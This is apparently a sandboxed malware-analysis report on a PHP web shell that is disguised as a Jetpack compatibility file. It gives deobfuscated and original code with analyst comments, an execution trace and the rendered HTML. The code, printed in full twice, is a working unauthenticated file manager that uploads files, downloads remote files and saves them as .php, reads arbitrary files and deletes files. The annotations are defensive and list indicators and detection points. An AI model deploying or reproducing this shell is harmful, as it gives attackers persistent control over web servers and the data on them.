PHP Malware Analysis

gtd.phtml

md5: 43fd96acd68715f1c0d96410e966f654


Screenshot


Attributes

Environment

Files

Input

URLs
  • https://jetpack.com/ (Original)
  • https://jetpack.com/support/content-options/ (Original)
  • https://jetpack.com/support/infinite-scroll/ (Original)
  • https://jetpack.com/support/responsive-videos/ (Original)


Deobfuscated PHP code

<?php 
// Analyst note: everything from here on is a browser-driven file manager (web shell).
// No authentication or access check appears anywhere in this listing; each request
// parameter below is used as supplied. During incident scoping, treat every file the
// PHP process account could reach as potentially read, replaced or deleted.
// Fixed marker string emitted at the top of every response; usable as a content indicator.
echo "@package @link";
// Turns off PHP error reporting for the rest of the request.
error_reporting(0);
// Sets this script's own mode to 0444 (read-only for owner, group and others).
// basename() yields a relative name, so the target is resolved against the working
// directory. In the execution trace on this page the call returned FALSE.
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo "\r\n<table width=\"380\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>Current Path : ";
// Working directory for the whole page: the "path" query parameter verbatim when
// supplied, otherwise the process's current directory. Nothing confines it to the web root.
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
// Normalise backslashes to forward slashes, then split into components to render a
// clickable breadcrumb. Components are echoed without HTML escaping.
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    // An empty first component means the path is absolute: emit the root link.
    if ($pat == '' && $id == 0) {
        // $a is assigned here but never read anywhere in this listing.
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    // Skip empty components produced by doubled or trailing slashes.
    if ($pat == '') {
        continue;
    }
    // Each breadcrumb link carries the cumulative path up to this component.
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
// Upload handler, multipart field "uploadedfile". basename() strips directory parts
// from the client-supplied name, but neither extension nor content is checked, and the
// destination directory is the request-controlled $path.
// Detection: multipart POSTs to this script carrying an "uploadedfile" part, and new
// files appearing in web-served directories outside a deployment.
if (isset($_FILES['uploadedfile'])) {
    $target_path = basename($_FILES["uploadedfile"]["name"]);
    if (move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $path . '/' . $target_path)) {
        echo "<font color=\"green\">file uploaded</font><br />";
    } else {
        echo "<font color=\"red\">upload fail</font><br />";
    }
}
// Upload form posts back to this script, carrying the current path in the query string.
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path={$path}\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
/**
 * Fetches a remote resource and writes it to a local file.
 *
 * cURL is tried first with a 10-second timeout; when that returns a falsy value the
 * function falls back to file_get_contents() with warnings suppressed by "@". Whatever
 * was obtained is then passed to file_put_contents() unconditionally, so a failed fetch
 * can still create the destination file. The cURL handle is never closed.
 *
 * Analyst note: this is the sample's download-and-write primitive, i.e. outbound HTTP
 * from the web server followed by a file write. Egress filtering for the web server
 * and file-integrity monitoring on web-served directories are the relevant controls.
 *
 * @param string $url Source URL; both callers in this listing pass it straight from the request.
 * @param string $dir Destination file path (despite the name, the callers pass a full
 *                    path that includes the file name).
 */
function get($url, $dir)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // Return the body as a string instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($ch);
    // Fallback path: a false or empty cURL result triggers a second attempt via the
    // URL stream wrapper.
    if (!$data) {
        $data = @file_get_contents($url);
    }
    // No check on $data before writing.
    file_put_contents($dir, $data);
}
// Remote-fetch handler, GET variant: parameters "url" and optional "dir".
// $_GET['url'] is read without isset(); the script has already disabled error reporting.
if ($_GET['url']) {
    $url = $_GET['url'];
    // Splits the URL so that $n[2] is the file stem and $n[3] is the text after the last dot.
    preg_match('/(.*)\\/(.*)\\.(.*?)$/', $url, $n);
    // Naming rule: a source ending in ".txt" is saved as "<stem>.php"; anything else is
    // saved as "moban.<ext>". Because of the .txt-to-.php rename, the transfer looks like
    // a plain-text download on the wire, so watch for newly created .php files on disk
    // rather than relying on extension-based network filtering.
    // Indicator: files named "moban.*" under the document root.
    if ($n[3] == 'txt') {
        $z = 'php';
        $name = $n[2];
    } else {
        $z = $n[3];
        $name = "moban";
    }
    // Destination is under DOCUMENT_ROOT, optionally inside the request-supplied
    // subdirectory, which is concatenated without any validation.
    if ($_GET['dir']) {
        $dir = $_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['dir'] . '/' . $name . '.' . $z;
    } else {
        $dir = $_SERVER["DOCUMENT_ROOT"] . '/' . $name . '.' . $z;
    }
    get($url, $dir);
    // file_exists() only shows that the path exists; it is also true for a file that
    // was already there or was written empty after a failed fetch.
    if (file_exists($dir)) {
        echo "<tr><td><font color=\"green\">download success</font></td></tr>";
    } else {
        echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
    }
// POST variant, driven by the form echoed below: same naming rule, but the destination
// directory is the posted "path" field rather than DOCUMENT_ROOT.
} elseif ($_POST['url']) {
    $url = $_POST['url'];
    preg_match('/(.*)\\/(.*)\\.(.*?)$/', $url, $n);
    if ($n[3] == 'txt') {
        $z = 'php';
        $name = $n[2];
    } else {
        $z = $n[3];
        $name = "moban";
    }
    $dir = $_POST['path'] . "/" . $name . '.' . $z;
    get($url, $dir);
    if (file_exists($dir)) {
        echo "<tr><td><font color=\"green\">download success</font></td></tr>";
    } else {
        echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
    }
}
// "Download" form: posts "url" plus a hidden "path" field pre-filled with the current directory.
echo "<tr><td><form method=\"POST\" action=\"?path={$path}\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"{$path}\"><input type=submit value=\"Download\"></form></td></tr>";
// Final dispatch: file viewer, index.php viewer, or directory listing with delete links.
// Detection: access-log entries for an unexpected script whose query string contains
// filesrc=, check=1, delfile=, option=delete, path=, url= or dir=.
if (isset($_GET['filesrc'])) {
    // File viewer: reads whatever path the request names. The path itself is echoed
    // unescaped; only the file contents go through htmlspecialchars().
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo "</tr></td></table><br />";
    echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['check']) && $_GET['check'] == '1') {
    // check=1 shortcut: displays DOCUMENT_ROOT/index.php.
    // NOTE(review): presumably used to inspect the site's entry page; purpose is
    // inferred, the listing only shows the read.
    $RootDir = $_SERVER['DOCUMENT_ROOT'];
    $filename = $RootDir . '/index.php';
    echo "<tr><td>Current File : ";
    echo $filename;
    echo "</tr></td></table><br />";
    echo '<pre>' . htmlspecialchars(file_get_contents($filename)) . '</pre>';
} else {
    echo "</table><br /><center>";
    // Delete action: unlink() on the request-supplied "delfile" path, triggered by a
    // plain GET with option=delete. No confirmation and no restriction on the path.
    if (isset($_GET['option']) && $_GET['option'] == 'delete') {
        if (unlink($_GET['delfile'])) {
            echo "<font color=\"green\">Delete File Done.</font><br />";
        } else {
            echo "<font color=\"red\">Delete File Error.</font><br />";
        }
    }
    echo "</center>";
    // Directory listing of $path: subdirectories first, then regular files.
    $scandir = scandir($path);
    echo "<div id=\"content\"><table width=\"380\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"><td>Name</td><td>Size</td><td>Options</td></tr>";
    foreach ($scandir as $dir) {
        // Keep only real subdirectories, skipping the "." and ".." entries.
        if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
            continue;
        }
        echo "<tr><td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td>DIR</td><td>none</td></tr>";
    }
    echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
    foreach ($scandir as $file) {
        if (!is_file("{$path}/{$file}")) {
            continue;
        }
        // Size in KB rounded to 3 decimals; shown in MB (2 decimals) from 1024 KB upward.
        $size = filesize("{$path}/{$file}") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size .= ' KB';
        }
        // Each row links to the viewer (filesrc) and to the delete action (delfile + option=delete).
        echo "<tr><td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td>" . $size . "</td><td><a href=\"?path={$path}&delfile={$path}/{$file}&option=delete\">Delete</a></td></tr>";
    }
    echo "</table></div>";
}

Execution traces

data/traces/43fd96acd68715f1c0d96410e966f654_trace-1676243883.4571.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:18:29.354948]
1	0	1	0.000153	393512
1	3	0	0.000376	423688	{main}	1		/var/www/html/uploads/gtd.phtml	0	0
2	4	0	0.000394	423688	error_reporting	0		/var/www/html/uploads/gtd.phtml	18	1	0
2	4	1	0.000410	423728
2	4	R			22527
2	5	0	0.000425	423688	basename	0		/var/www/html/uploads/gtd.phtml	19	1	'/uploads/gtd.phtml'
2	5	1	0.000439	423760
2	5	R			'gtd.phtml'
2	6	0	0.000454	423728	chmod	0		/var/www/html/uploads/gtd.phtml	19	2	'gtd.phtml'	292
2	6	1	0.000477	423800
2	6	R			FALSE
2	7	0	0.000491	423688	getcwd	0		/var/www/html/uploads/gtd.phtml	25	0
2	7	1	0.000504	423736
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/gtd.phtml	25	$path = '/var/www/html/uploads'
2	8	0	0.000532	423736	str_replace	0		/var/www/html/uploads/gtd.phtml	27	3	'\\'	'/'	'/var/www/html/uploads'
2	8	1	0.000547	423832
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/gtd.phtml	27	$path = '/var/www/html/uploads'
2	9	0	0.000571	423736	explode	0		/var/www/html/uploads/gtd.phtml	28	2	'/'	'/var/www/html/uploads'
2	9	1	0.000585	424312
2	9	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/gtd.phtml	28	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 0
1		A						/var/www/html/uploads/gtd.phtml	31	$a = TRUE
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 1
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 2
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 3
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 4
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
2	10	0	0.000824	424240	scandir	0		/var/www/html/uploads/gtd.phtml	113	1	'/var/www/html/uploads'
2	10	1	0.000855	424864
2	10	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'gtd.phtml', 5 => 'prepend.php']
1		A						/var/www/html/uploads/gtd.phtml	113	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'gtd.phtml', 5 => 'prepend.php']
2	11	0	0.000894	424880	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/.'
2	11	1	0.000912	424944
2	11	R			TRUE
2	12	0	0.000959	424912	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/..'
2	12	1	0.000974	424960
2	12	R			TRUE
2	13	0	0.000988	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/.htaccess'
2	13	1	0.001003	424960
2	13	R			FALSE
2	14	0	0.001017	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/data'
2	14	1	0.001031	424960
2	14	R			TRUE
2	15	0	0.001045	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/gtd.phtml'
2	15	1	0.001058	424960
2	15	R			FALSE
2	16	0	0.001072	424928	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/prepend.php'
2	16	1	0.001087	424976
2	16	R			FALSE
2	17	0	0.001101	424920	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/.'
2	17	1	0.001116	424944
2	17	R			FALSE
2	18	0	0.001129	424912	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/..'
2	18	1	0.001143	424960
2	18	R			FALSE
2	19	0	0.001155	424920	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/.htaccess'
2	19	1	0.001169	424960
2	19	R			TRUE
2	20	0	0.001182	424920	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/.htaccess'
2	20	1	0.001195	424960
2	20	R			64
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 0.0625
2	21	0	0.001225	424864	round	0		/var/www/html/uploads/gtd.phtml	123	2	0.0625	3
2	21	1	0.001238	424936
2	21	R			0.063
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 0.063
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '0.063 KB'
2	22	0	0.001275	424960	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/data'
2	22	1	0.001290	425000
2	22	R			FALSE
2	23	0	0.001303	424960	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/gtd.phtml'
2	23	1	0.001317	425000
2	23	R			TRUE
2	24	0	0.001329	424960	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/gtd.phtml'
2	24	1	0.001341	425000
2	24	R			4648
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 4.5390625
2	25	0	0.001365	424864	round	0		/var/www/html/uploads/gtd.phtml	123	2	4.5390625	3
2	25	1	0.001378	424936
2	25	R			4.539
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 4.539
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '4.539 KB'
2	26	0	0.001414	424968	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/prepend.php'
2	26	1	0.001430	425016
2	26	R			TRUE
2	27	0	0.001443	424976	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/prepend.php'
2	27	1	0.001456	425016
2	27	R			57
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 0.0556640625
2	28	0	0.001479	424872	round	0		/var/www/html/uploads/gtd.phtml	123	2	0.0556640625	3
2	28	1	0.001492	424944
2	28	R			0.056
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 0.056
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '0.056 KB'
1	3	1	0.001528	424912
			0.001557	318560
TRACE END   [2023-02-12 21:18:29.356382]


Generated HTML code

<html><head></head><body>@package @link
<table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST" action="?path=/var/www/html"><input name="uploadedfile" type="file"><input type="submit" value="Upload File"></form></td></tr><tr><td><form method="POST" action="?path=/var/www/html"><span>Url: </span><input type="text" name="url" value=""><input type="hidden" name="path" value="/var/www/html"><input type="submit" value="Download"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr><td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td>0 KB</td><td><a href="?path=/var/www/html&amp;delfile=/var/www/html/beneri.se_malware_analysis&amp;option=delete">Delete</a></td></tr><tr><td><a href="?filesrc=/var/www/html/gtd.phtml&amp;path=/var/www/html">gtd.phtml</a></td><td>4.539 KB</td><td><a href="?path=/var/www/html&amp;delfile=/var/www/html/gtd.phtml&amp;option=delete">Delete</a></td></tr></tbody></table></div></body></html>

Original PHP code

<?php
/**
 * Jetpack Compatibility File
 *
 * @link https://jetpack.com/
 *
 * @package stag-blocks
 */

/**
 * Jetpack setup function.
 *
 * See: https://jetpack.com/support/infinite-scroll/
 * See: https://jetpack.com/support/responsive-videos/
 * See: https://jetpack.com/support/content-options/
 */
// Analyst note: the Jetpack / stag-blocks header comments preceding this code do not
// describe it. What follows is a browser-driven file manager (web shell) with no
// authentication or access check anywhere in the file.
// Fixed marker string emitted at the top of every response; usable as a content indicator.
echo("@package @link");
// Turns off PHP error reporting for the rest of the request.
error_reporting(0);
// Sets this script's own mode to 0444 (read-only for owner, group and others); the
// relative name from basename() is resolved against the working directory.
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo '
<table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>Current Path : ';
// Working directory: the "path" query parameter verbatim when supplied, otherwise the
// current directory. Nothing confines it to the web root.
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
// Normalise separators and split into components for the breadcrumb; components are
// echoed without HTML escaping.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
// An empty first component means the path is absolute: emit the root link.
if($pat == '' && $id == 0){
// $a is assigned here but never read anywhere in this file.
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
// Each breadcrumb link carries the cumulative path up to this component.
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
// Upload handler, multipart field "uploadedfile": basename() strips directory parts from
// the client-supplied name, but extension and content are unchecked and the destination
// directory is the request-controlled $path.
if(isset($_FILES['uploadedfile'])){
$target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"],$path.'/'.$target_path)){echo '<font color="green">file uploaded</font><br />';}else{echo '<font color="red">upload fail</font><br />';}
} 
// Upload form posts back to this script, carrying the current path in the query string.
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path=$path\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
/**
 * Fetches a remote resource and writes it to a local file.
 *
 * cURL is tried first with a 10-second timeout; a falsy result triggers a fallback to
 * file_get_contents() with warnings suppressed. The result is written unconditionally,
 * so a failed fetch can still create the destination file.
 *
 * Analyst note: download-and-write primitive of the sample; outbound HTTP from the
 * web server followed by a file write is the behaviour to monitor for.
 *
 * @param string $url Source URL, passed by the callers straight from the request.
 * @param string $dir Destination file path including the file name.
 */
function get($url, $dir) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	// Return the body as a string instead of printing it.
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch,CURLOPT_TIMEOUT,10);
	$data = curl_exec($ch);
	// Second attempt via the URL stream wrapper when cURL yields nothing.
	if(!$data){
		$data = @file_get_contents($url);
	}
	// No check on $data before writing.
	file_put_contents($dir, $data);
}
// Remote-fetch handler, GET variant: parameters "url" and optional "dir".
if($_GET['url']){
	$url = $_GET['url'];
	// $n[2] is the file stem, $n[3] the text after the last dot.
	preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
	// Naming rule: a ".txt" source is saved as "<stem>.php"; anything else becomes
	// "moban.<ext>". Indicator: files named "moban.*" under the document root, and
	// newly created .php files that no deployment accounts for.
	if($n[3]=='txt'){
		$z='php';
		$name=$n[2];
	}else{
		$z=$n[3];
		$name="moban";
	}
	// Destination under DOCUMENT_ROOT, optionally inside the unvalidated "dir" subpath.
	if($_GET['dir']){
		$dir=$_SERVER["DOCUMENT_ROOT"].'/'.$_GET['dir'].'/'.$name.'.'.$z;
	}else{
		$dir=$_SERVER["DOCUMENT_ROOT"].'/'.$name.'.'.$z;
	}
	get($url,$dir);
	// file_exists() is also true for a pre-existing file or one written empty.
	if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
// POST variant: same naming rule, destination directory taken from the posted "path" field.
}elseif($_POST['url']){
	$url = $_POST['url'];
	preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
	if($n[3]=='txt'){
		$z='php';
		$name=$n[2];
	}else{
		$z=$n[3];
		$name="moban";
	}
	$dir = $_POST['path']."/".$name.'.'.$z;
	get($url,$dir);
	if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
}
// "Download" form: posts "url" plus a hidden "path" field pre-filled with the current directory.
echo "<tr><td><form method=\"POST\" action=\"?path=$path\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";
// Final dispatch: file viewer, index.php viewer, or directory listing with delete links.
// Detection: access-log entries for an unexpected script whose query string contains
// filesrc=, check=1, delfile=, option=delete, path=, url= or dir=.
if(isset($_GET['filesrc'])){
	// File viewer: reads whatever path the request names. The path is echoed
	// unescaped; only the file contents go through htmlspecialchars().
	echo "<tr><td>Current File : ";
	echo $_GET['filesrc'];
	echo '</tr></td></table><br />';
	echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
	}elseif(isset($_GET['check']) &&  $_GET['check'] == '1'){
		// check=1 shortcut: displays DOCUMENT_ROOT/index.php.
		// NOTE(review): purpose is inferred; the code only shows the read.
		$RootDir = $_SERVER['DOCUMENT_ROOT'];
		$filename = $RootDir.'/index.php';
		echo "<tr><td>Current File : ";
		echo $filename;
		echo '</tr></td></table><br />';
		echo('<pre>'.htmlspecialchars(file_get_contents($filename)).'</pre>');
	}else{
	echo '</table><br /><center>';
	// Delete action: unlink() on the request-supplied "delfile" path, triggered by a
	// plain GET with option=delete. No confirmation and no restriction on the path.
	if(isset($_GET['option']) &&  $_GET['option'] == 'delete'){
		if(unlink($_GET['delfile'])){
			echo '<font color="green">Delete File Done.</font><br />';
		}else{
			echo '<font color="red">Delete File Error.</font><br />';
		}
	}
	echo '</center>';
	// Directory listing of $path: subdirectories first, then regular files.
	$scandir = scandir($path);
	echo '<div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr>';
	foreach($scandir as $dir){
		// Keep only real subdirectories, skipping "." and "..".
		if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
			echo "<tr><td><a href=\"?path=$path/$dir\">$dir</a></td><td>DIR</td><td>none</td></tr>";
		}
	echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
	foreach($scandir as $file){
		if(!is_file("$path/$file")) continue;
		// Size in KB rounded to 3 decimals; shown in MB (2 decimals) from 1024 KB upward.
		$size = filesize("$path/$file")/1024;
		$size = round($size,3);
		if($size >= 1024){
			$size = round($size/1024,2).' MB';
		}else{
			$size = $size.' KB';
		}
		// Each row links to the viewer (filesrc) and to the delete action (delfile + option=delete).
		echo "<tr><td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td>".$size."</td><td><a href=\"?path=$path&delfile=$path/$file&option=delete\">Delete</a></td></tr>";
	}
	echo '</table></div>';
}